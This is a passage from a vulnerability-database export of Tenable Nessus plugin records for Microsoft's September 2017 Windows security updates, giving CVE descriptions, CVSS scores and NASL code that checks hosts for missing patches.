CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038786/windows-server-2012-update-kb4038786\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91b2bd74\");\n # https://support.microsoft.com/en-us/help/4038799/windows-server-2012-update-kb4038799\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35364720\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038786 or Cumulative update KB4038799.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038786', '4038799');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038786, 4038799])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038793\nor cumulative update 4038792. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8682", "CVE-2017-8684", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8680", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8714", "CVE-2017-8728", "CVE-2017-8686", "CVE-2017-8677", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8675"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038792.NASL", "href": "https://www.tenable.com/plugins/nessus/103131", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103131);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038792\");\n script_xref(name:\"MSFT\", value:\"MS17-4038792\");\n script_xref(name:\"MSKB\", value:\"4038793\");\n script_xref(name:\"MSFT\", value:\"MS17-4038793\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038793\nor cumulative update 4038792. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038792/windows-8-1-update-kb4038792\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?085e4d22\");\n # https://support.microsoft.com/en-us/help/4038793/windows-8-1-update-kb4038793\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf3ecec7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038793 or Cumulative update KB4038792.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038792', '4038793');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038792, 4038793])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707,\n CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user 